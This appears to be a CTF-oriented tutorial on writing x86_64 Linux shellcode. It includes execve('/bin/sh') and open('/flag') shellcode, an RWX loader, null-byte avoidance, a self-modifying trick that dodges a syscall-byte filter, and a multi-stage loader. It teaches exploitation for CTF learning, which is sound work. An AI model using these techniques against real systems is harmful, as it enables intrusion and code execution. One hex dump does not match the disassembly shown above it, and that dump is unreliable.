I have faith of who ever reading this article is not a layman, you are probably familiar with CTFs, overflowed the buffer and smashed the stack once, and knowing what you are getting your self into. I assume you know what a CTF challenge is, x86 assembly basics, and using linux.

The term “shellcode” originates from the common objective of an exploit usually to execute a command shell /bin/sh. the code is written in an assembly language.

#execve("/bin/bash",{NULL},{NULL})
.text
.global _start
_start:
    mov rax, 0x68732f6e69622f
    push rax
    push rsp
    pop rdi
    xor eax, eax
    push rax
    mov al, 59
    push rsp
    pop rdx
    push rsp
    pop rsi
    syscall

Looking at his code for a first time is intimidating, and scary. but once you learn how to read it, writing the shellcode would be the easiest part of the job.

How does it execute

shellcode is simply executable bytes, it is a machine instructions assembled to perform a small task once control is hijacked.

In today’s computers, there are two architectures, Von Neumann, which sees and stores code as data. And Harvard architectures that stores data and code separately.

almost all general purpose architectures (x86, ARM, MIPS, etc..) are Von Neumann. That would be the focus of this article.

Starting out, we will use a simple shellcode loader to test and execute our shellcode.

#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()
 
int main(void) {
    // 1. Allocate an executable memory page.
    //    PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
    //    MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
 
    if (page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
 
    printf("[+] Memory allocated at: %p\n", page);
 
    // 2. Read shellcode from standard input (stdin) into the allocated page.
    printf("[+] Reading shellcode from stdin...\n");
    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
 
    if (bytes_read <= 0) {
        perror("read failed or no input provided");
        return 1;
    }
 
    printf("[+] Read %ld bytes. Executing now...\n", bytes_read);
 
    // 3. Create a function pointer to the page and call it.
    //    This transfers execution to the shellcode.
    void (*shellcode_func)() = page;
    shellcode_func();
 
    // This line will likely not be reached if the shellcode exits.
    return 0;
}

Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.

the mmap call is important, if we requested a memory without PROT_EXEC The moment the program tried to execute the code at page, the CPU’s memory management unit would see the “No-Execute” permission on that memory page and trigger a protection fault, resulting in a SIGSEGV.

We are asking for a single page (0x1000 bytes) of memory that is

  1. Writable: we load shellcode bytes into it using read
  2. Executable: the CPU will happily jmp into it without complaining.
void *page = mmap(
    NULL,                // Let the kernel choose the address
    4096,                // One page = 4096 bytes (common page size)
    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
    MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
    -1,                  // File descriptor (-1 since it's anonymous)
    0                    // Offset (not used here)
);

The code is not compiled using the default gcc configuration, by default, modern compilers have protection against shellcode, you need to disable when compiling the program.

gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute

Using checksec, we see the Stack: Executable. That means that the data on the stack could be treated as code.

$ pwn checksec --file=execute
[*] '/tmp/test/execute'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes

Writing Shellcode

Before i start to write shellcode, i open loads documentation, syscall tables, and the manual for whatever assembly architecture i am writing. To mention a few, I use the Systrack: Linux kernel syscall tables for system calls lookups. And felix cloutier’s x86 and amd64 instruction reference, It’s easier to navigate, but the offical intel manual also works.

When writing shellcode, your goal is to execute Syscalls. Syscalls = system calls. They’re the special functions your program uses to talk to the kernel.

  • read to ask kernel to read from a file.
  • write to ask kernel to write to a file.
  • execve to ask the kernel to run another program.
  • exit to tell kernel you’re done and exit cleanly.

Syscalls are functions, like any other functions, the take parameters. It is not as easy as function(arg1, arg2, arg3), but you learn to do it.

Call convention for x86 and x86_64 architechtures:

ARCHRETURNARG0ARG1ARG2ARG3ARG4ARG5
x86eaxebxecxedxesiediebp
x64raxrdirsirdxr10r8r9

To execute shellcode, You lookup the syscall number you want, the simplist example is exit() syscall, looking it up in a man page you find this definition

exit - cause normal process termination

#include <stdlib.h>

[[noreturn]] void exit(int status);

It takes only one parameter, exit status. On unix-like systems, a successful exit is exit(0), so lets write that in shellcode. Never mind the first 3 lines, they are important for the compiler not for us for this case.

.intel_syntax noprefix
 
.global _start
 
_start:
    mov rax, 60      # syscall for exit
    syscall          # execute the shellcode

Compile the shellcode using the following.

gcc -nostdlib -static hello.S -o hello.elf

This will create an elf file, inspect it and see the disassembly code. objdump.

$ objdump -d -Mintel hello.elf

hello.elf:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:   48 c7 c0 3c 00 00 00   mov    rax,0x3c
  401007:   0f 05                  syscall

We only want the .text section of the elf file. to extract it use objdump

objcopy --dump-section .text=hello.bin hello.elf

Use xxd to get compiled code

$ xxd hello.bin
00000000: 48c7 c078 0000 00bb 0200 0000 4831 db6a  H..x........H1.j
00000010: 785f                                     x_

You can run the elf file just like any other linux program. it exits with status 0, to check the status echo $?.

./hello.elf
echo $?
# 0

For more logging use strace to see the syscalls get executed.

strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0)                                 = ?
# +++ exited with 0 +++

Now enough with long introduction, Lets get into the notes.

Problems you would run into when writing shellcode

Here are some of the common problems that you will run into eventually when you are writing shellcode.

Size constraints (Byte budget hell)

Your goal is to use the smallest number of bytes as possible.

XOR Instruction

Be careful of using mov too much. To zero out a register, do not use the instruction mov. Use xor instead.

mov    al,0x0       ; b0 00
mov    ax,0x0       ; 66 b8 00 00
mov    eax,0x0      ; b8 00 00 00 00
mov    rax,0x0      ; 48 c7 c0 00 00 00 00
 
xor    al,al        ; 30 c0
xor    ax,ax        ; 66 31 c0
xor    eax,eax      ; 31 c0
xor    rax,rax      ; 48 31 c0

Push Pop

push something to the stack, and get it back by using pop

;; 7 bytes
mov rax, 0xbadc0de      ; 48 c7 c0 de c0 ad 0b
 
;; 6 bytes
push   0xbadc0de        ; 68 de c0 ad 0b
pop    rax              ; 58

Use what you have

When you hijack the control flow of the code (e.g jmp rax) you may already have some values stored at the registers. for example, when using the read syscall, and rdx has a non-zero value. Use it as it is as the parameter count. It is a sitiuation dependent but you get the point.

Strings

If you think strings are hard in C, well let me introduce you to x86_64.

I will use open syscall as an example.

# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f           # push /flag filename
push rbx
mov rax, 2                      # open() syscall
mov rdi, rsp                    # point to first item on stack ("/flag")
mov rsi, 0                      # NULL the second arg (O_RDONLY)
syscall                         # open("/flag", NULL)

This 0x67616c662f is /flag. it’s in little endian. to reproduce it you have to run the following command.

echo -ne "/flag" | rev | xxd -p
# 67616c662f

The down side is you will struggle with long strings as it may not fit in the registers. One other way using labels, I prefer this way but it may not always work.

# open("/flag", O_RDONLY)
push 2
pop rax             # open syscall = 2
 
lea rdi, [rip+flag]     # flag string
xor rsi, rsi        # O_RDONLY = 0
 
syscall
 
flag:
  .string "/flag"

There is also building the string on the stack. almost always work, but it requires lots of work.

# open("/flag", O_RDONLY)
# push "flag" little endian to stack
push 0x67616C66
pop  rax                        # rax = 0x0000000067616C66
 
# shift left 8 bits to make room for the '/' byte
shl  rax, 8                     # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop  rbx                        # rbx = 0x...0000002F
 
# OR the '/' into the low byte
or   rax, rbx                   # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax
 
push 2                          # open syscall
pop rax
 
lea rdi, [rsp]                  # filename = "/flag"
xor rsi, rsi                    # mode_t = O_RDONLY
 
syscall

Input filtering

Input maybe manipulated, filtered of some bytes before execution.

String termination & \x00ull bytes

One great resource i found is nets.ec/Shellcode/Null-free which has many great examples.

  1. Use xor instruction instead of mov

This will use less bytes and not include null bytes.

# bad
mov rax, 0
 
# good
xor rax, rax
  1. Use push and pop instructions instead of mov
push 0x70
pop rax
syscall
  1. Use shifting instructions
mov     rdi, 0x68732f6e69622f6a   ; move the 64-bit immediate into RDI ('hs/nib/j' in little-endian)
shr     rdi, 8                    ; logical right-shift RDI by 8 bits -> zero-terminates the low byte
push    rdi                       ; push the 64-bit value (now contains "/bin/sh\0" when viewed as bytes)
push    rsp                       ; push current RSP (stack pointer)
pop     rdi                       ; pop that value into RDI -> RDI points at the pushed string

Self modifying shellcode

One time i was solving a ctf challenge, and it filters the syscall bytes 0F 05. I wrote a shellcode that constructs the syscall bytes 0F 05 at runtime so it won’t be filtered. The following code increments the 0e by 1, so it becomes 0F and this way it bypasses the filter.

inc BYTE PTR [rip]
.byte 0x0e, 0x05

NOP Padding

nop is an instruction that does nothing, sometimes you use it for padding, aligning or whatever reason, it is useful.

.global _start
 
_start:
    # Your code here
    nop
    nop
    #...
    nop
 
    .fill 10, 1, 0x90    # 10 NOP instructions
    # or
    .rept 10
        nop
    .endr
 
    # More code here

Multi stage shellcode

Some times there will be input filtering that it is impossible to write shellcode to do anything meaningful. One way to solve this problem is a multi stage shellcode. Write a stage 1 shellcode “Loader” that its job is to load another shellcode. Only the stage 1 gets filtered.

push 0
push 0
pop rax         # read syscall
pop rdi         # stdin
 
push rsp
pop rsi         # rsi = rsp (buffer)
 
push 100
pop rdx
 
syscall
 
jmp rsp

Use Pwntools when possible

it has lots of functions that automates and eases the process of writing shellcode. sometimes you don’t need to write shellcode at all, it does it for you. But first you have to understand how the magic works, if not you will waste a lot of time. RTFM.

Pwn shellcraft

pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell

Pwn template

i like to use pwn template command to generate a starting point for my challenges.

then use the asm("") function to write the shellcode instead of compiling and passing it by hand through the shell.

stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")
 
io.sendline(stage1)
pause(1)
io.sendline(stage2)
 
io.interactive()

GDB Debugger

Using a debugger is essential. gdb is good but it lacks features, that is why i recommend using pwndbg or gef with it. they help with visualisation and provide functions that are useful for debugging.

gdbscript = f'''
 
# break points
#...
 
source /opt/gef/gef.py
continue
'''

References